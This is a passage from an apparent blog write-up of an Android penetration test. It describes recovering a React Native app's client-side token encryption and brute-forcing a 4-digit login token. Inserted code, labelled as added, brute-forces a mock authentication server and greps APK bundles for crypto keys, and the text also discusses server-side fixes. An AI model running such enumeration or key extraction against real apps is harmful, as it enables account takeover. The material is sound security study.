Android Application’s Client Side Encryption Bypass Leads to Account Takeover

Sanjay Gondaliya
6 min read · Dec 14, 2020

During an Android application penetration test, I came across an interesting scenario: the application was built on React Native and its source code was obfuscated. During login the application asks for a user ID and a token, and the token is only 4 digits. The token value is encrypted on the client side, and no brute-force protection is implemented on the server side.
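The security point of that setup, as an added example that is not code from the original post: client-side encryption of a 4-digit token does not add entropy. Whatever deterministic transform the app applies, its key ships inside the APK, so an attacker who reimplements it still only has 10,000 candidates to send to the server. The transform below (HMAC-SHA256 with a key assumed to have been recovered from the bundle) is a stand-in, not the mechanism from the article, and the `AuthServer` class is a constructed mock of the `/user/authenticate` endpoint with and without a per-user lockout.

```python
import hashlib
import hmac

# Stand-in for the app's client-side token transform. This is NOT the mechanism
# from the article (which is not reproduced here); it only needs to be deterministic
# and keyed with material that ships inside the APK, which is exactly what lets an
# attacker reimplement it. Assumption: the key below was recovered from the JS bundle.
CLIENT_KEY = b"key-recovered-from-bundle"


def client_encrypt_token(token: str) -> str:
    """What the app puts in the 'token' field of /user/authenticate."""
    return hmac.new(CLIENT_KEY, token.encode(), hashlib.sha256).hexdigest()


class AuthServer:
    """Constructed mock of the /user/authenticate endpoint.

    max_failures=None reproduces the vulnerable setting from the article (no
    brute-force protection); a small integer models a per-user lockout.
    """

    def __init__(self, users, max_failures=None):
        self._users = users            # userId -> client_encrypt_token(real token)
        self._max_failures = max_failures
        self._failures = {}

    def authenticate(self, user_id: str, enc_token: str) -> bool:
        if (self._max_failures is not None
                and self._failures.get(user_id, 0) >= self._max_failures):
            return False               # locked out: refuse every further attempt
        expected = self._users.get(user_id, "")
        if hmac.compare_digest(expected, enc_token):
            return True
        self._failures[user_id] = self._failures.get(user_id, 0) + 1
        return False


def brute_force(server: AuthServer, user_id: str):
    """Enumerate all 10,000 four-digit tokens through the attacker's own copy of
    the client transform. Returns (token, requests_sent) or (None, 10000)."""
    for n in range(10_000):
        token = f"{n:04d}"
        if server.authenticate(user_id, client_encrypt_token(token)):
            return token, n + 1
    return None, 10_000


if __name__ == "__main__":
    # Constructed victim account; the server only ever sees the encrypted form.
    vulnerable = AuthServer({"u1001": client_encrypt_token("4271")})
    print(brute_force(vulnerable, "u1001"))        # ('4271', 4272)
    locked = AuthServer({"u1001": client_encrypt_token("4271")}, max_failures=5)
    print(brute_force(locked, "u1001"))            # (None, 10000)
```

The fix has to live on the server: a per-user attempt counter or rate limit, and ideally a token space larger than four digits. A lockout on its own can be turned into a denial of service against the victim, so production systems usually combine it with progressive delays or step-up verification rather than a hard lock.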

Problem Statement

The challenge was to identify the encryption mechanism used for token encryption.

Problem Analysis

During the Android application penetration test, I used various tools such as apktool, dex2jar and jd-gui to try to understand the client-side encryption process.

Because the application is built on React Native, reversing it yields a single bundled JavaScript source file. Identifying the logic in that file is much harder than the usual approach for a Java-based Android application, where one simply reverses the APK and analyzes the decompiled source, since that source is usually not obfuscated.
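A practical way to get a foothold in that single bundled file, as an added example that is not code from the original post: pull the JavaScript bundle straight out of the APK (which is just a zip) and grep it for crypto-library identifiers, which tend to survive minification because they are property names on a library object or package names passed to `require()`. The bundle path `assets/index.android.bundle` is React Native's default and is an assumption here; the minified fragment in `SAMPLE_BUNDLE` is a constructed fixture, not the application from the article.

```python
import os
import re
import tempfile
import zipfile

# Assumption: the Metro bundle sits at React Native's default path. Other builds
# rename it or ship Hermes bytecode (.hbc), which is not plain text and needs a
# Hermes disassembler rather than a text grep.
BUNDLE_CANDIDATES = ("assets/index.android.bundle",)

# Identifiers that tend to survive minification: property names on a library
# object (CryptoJS, Node's crypto) and package names inside require().
CRYPTO_PATTERNS = (
    r"crypto-js",
    r"\.AES\.encrypt\(",
    r"\.enc\.Utf8\.parse\(",
    r"createCipheriv\(",
    r"\bencrypt\w*\(",
)


def extract_bundle(apk_path):
    """Return (member_name, js_text) for the JS bundle, or (None, None).
    js_text is None when the member is not UTF-8 text (likely Hermes bytecode)."""
    with zipfile.ZipFile(apk_path) as apk:
        names = apk.namelist()
        candidates = [n for n in BUNDLE_CANDIDATES if n in names]
        candidates += [n for n in names if n.endswith(".bundle") and n not in candidates]
        for name in candidates:
            raw = apk.read(name)
            try:
                return name, raw.decode("utf-8")
            except UnicodeDecodeError:
                return name, None
    return None, None


def find_crypto_hits(js_text, context=48):
    """Grep the minified bundle; returns [(match, offset, snippet)] sorted by offset."""
    hits = []
    for pat in CRYPTO_PATTERNS:
        for m in re.finditer(pat, js_text):
            lo, hi = max(0, m.start() - context), min(len(js_text), m.end() + context)
            hits.append((m.group(0), m.start(), js_text[lo:hi]))
    hits.sort(key=lambda h: h[1])
    return hits


def string_literals_near(js_text, offset, window=200):
    """Quoted string literals around a hit: hard-coded keys and IVs usually sit
    right next to the call that consumes them."""
    region = js_text[max(0, offset - window): offset + window]
    return re.findall(r'"([^"\\]{8,})"', region)


# Constructed sample of a minified Metro bundle fragment (not from the article's app).
SAMPLE_BUNDLE = (
    'var t=require("crypto-js");function e(n){var r=t.enc.Utf8.parse("0123456789abcdef"),'
    'o=t.enc.Utf8.parse("fedcba9876543210");return t.AES.encrypt(n,r,{iv:o,mode:t.mode.CBC})'
    '.toString()}function s(u,p){return fetch("/user/authenticate",{method:"POST",'
    'body:JSON.stringify({userId:u,token:e(p)})})}'
)


def build_sample_apk(bundle=SAMPLE_BUNDLE):
    """Write a minimal zip laid out like an APK to a temp dir; returns its path."""
    path = os.path.join(tempfile.mkdtemp(), "sample.apk")
    with zipfile.ZipFile(path, "w") as apk:
        apk.writestr("AndroidManifest.xml", "<manifest/>")
        apk.writestr("classes.dex", b"dex\n035\0")
        apk.writestr("assets/index.android.bundle", bundle)
    return path


def triage_apk(apk_path):
    """End-to-end: bundle name, crypto hits, and string literals near the first hit."""
    name, js = extract_bundle(apk_path)
    if js is None:
        return name, [], []
    hits = find_crypto_hits(js)
    literals = string_literals_near(js, hits[0][1]) if hits else []
    return name, hits, literals


if __name__ == "__main__":
    name, hits, literals = triage_apk(build_sample_apk())
    print(name)
    for match, off, snippet in hits:
        print(f"{off:6d} {match:22s} ...{snippet}...")
    print("literals near first hit:", literals)
```

On a real bundle the hit list is the starting point, not the answer: confirm the candidate function by setting a breakpoint on it with the React Native debugger or by hooking it at runtime (Frida), and check whether the key and IV are static literals, as in the fixture, or derived from something the server sends.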

POC Steps

During the login process, I observed that when the user ID and the 4-digit token are entered in the application, it sends only one HTTP request, to "/user/authenticate", containing the encrypted token and the userId.
Based on that, I concluded that the encryption process might be at the…
